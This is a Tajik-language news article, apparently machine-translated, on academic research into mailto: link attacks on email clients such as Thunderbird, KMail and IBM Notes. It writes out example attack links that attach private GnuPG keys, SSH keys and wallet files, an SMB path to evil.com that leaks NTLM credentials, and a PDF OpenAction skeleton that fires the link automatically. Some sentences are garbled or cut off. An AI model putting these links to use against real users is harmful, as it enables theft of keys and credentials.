Муҳаққиқони Донишгоҳи Рур Бохум (Олмон)
Пайвандҳо «
Мизоҷони почтаи Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ва Pegasus Mail ба ҳамлаи ночиз, ки ба шумо имкон медиҳад ба таври худкор замима кунед, осебпазир буданд. ягон файли маҳаллӣ, ки тавассути истиноди "mailto:?attach=path_to_file" муайян карда мешавад. Файл бе нишон додани огоҳӣ замима карда мешавад, бинобар ин, бидуни таваҷҷӯҳи махсус, корбар пай набарад, ки мактуб бо замима фиристода мешавад.
Масалан, бо истифода аз истинод ба монанди "mailto:[почтаи электронӣ ҳифз карда шудааст]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" шумо метавонед калидҳои хусусиро аз GnuPG ба ҳарф гузоред. Шумо инчунин метавонед мундариҷаи ҳамёнҳои криптографиро (~/.bitcoin/wallet.dat), калидҳои SSH (~/.ssh/id_rsa) ва ҳама гуна файлҳои ба корбар дастрас фиристед. Ғайр аз он, Thunderbird ба шумо имкон медиҳад, ки гурӯҳҳои файлҳоро бо ниқоб бо истифода аз конструксияҳо ба монанди "attach=/tmp/*.txt" замима кунед.
Илова ба файлҳои маҳаллӣ, баъзе муштариёни почтаи электронӣ истинодҳоро ба нигаҳдории шабака ва роҳҳо дар сервери IMAP коркард мекунанд. Аз ҷумла, IBM Notes ба шумо имкон медиҳад, ки файлро аз феҳристи шабакавӣ ҳангоми коркарди истинодҳо ба мисли “attach=\\evil.com\dummyfile” интиқол диҳед ва инчунин параметрҳои аутентификатсияи NTLM-ро тавассути ирсоли истинод ба сервери SMB таҳти назорати ҳамлагар бозмедорад. (дархост бо корбари параметрҳои аутентификатсияи ҷорӣ фиристода мешавад).
Thunderbird дархостҳоро ба монанди "attach=imap:///fetch>UID>/INBOX>1/"-ро бомуваффақият коркард мекунад, ки ба шумо имкон медиҳанд мундариҷаро аз ҷузвдонҳои сервери IMAP замима кунед. Ҳамзамон, паёмҳои аз IMAP гирифташуда, ки тавассути OpenPGP ва S/MIME рамзгузорӣ шудаанд, пеш аз фиристодан аз ҷониби муштарии почта ба таври худкор рамзкушоӣ карда мешаванд. Таҳиякунандагони Thunderbird буданд
Версияҳои кӯҳнаи Thunderbird инчунин ба ду варианти дигари ҳамла дар PGP ва S/MIME, ки муҳаққиқон пешниҳод кардаанд, осебпазир буданд. Аз ҷумла, Thunderbird, инчунин OutLook, PostBox, eM Client, MailMate ва R2Mail2 мавриди ҳамлаи калидии ивазкунанда қарор гирифтанд, ки бо сабаби он, ки муштарии почта ба таври худкор сертификатҳои нави дар паёмҳои S/MIME интиқолшавандаро ворид ва насб мекунад, ки имкон медиҳад ҳамлакунанда барои ташкили иваз кардани калидҳои ҷамъиятӣ, ки аллакай аз ҷониби корбар нигоҳ дошта шудааст.
Ҳамлаи дуюм, ки Thunderbird, PostBox ва MailMate ба онҳо ҳассос аст, хусусиятҳои механизми автоматии сабти лоиҳаи паёмҳоро идора мекунад ва имкон медиҳад, ки бо истифода аз параметрҳои mailto рамзкушоиши паёмҳои рамзгузоришуда ё илова кардани имзои рақамиро барои паёмҳои худсарона оғоз кунад. интиқоли минбаъдаи натиҷа ба сервери IMAP ҳамлакунанда. Дар ин ҳамла матни рамзӣ тавассути параметри "бадан" интиқол дода мешавад ва теги "meta refresh" барои оғоз кардани занг ба сервери IMAP ҳамлакунанда истифода мешавад. Барои намуна: ' '
Барои ба таври худкор коркарди истинодҳои "mailto:" бидуни ҳамкории корбар, ҳуҷҷатҳои PDF-и махсус тарҳрезишударо истифода бурдан мумкин аст - амали OpenAction дар PDF ба шумо имкон медиҳад, ки ҳангоми кушодани ҳуҷҷат коркардкунандаи mailto-ро ба таври худкор оғоз кунед:
% PDF-1.5
1 0 объект
<< /Намуди /Каталог /OpenAction [2 0 R] >>
endobj
2 0 объект
<< /Намуди /Амал /S /URI/URI (mailto:?body=——ПАЁМИ PGP-ро оғоз кунед——[…])>>
endobj
Манбаъ: opennet.ru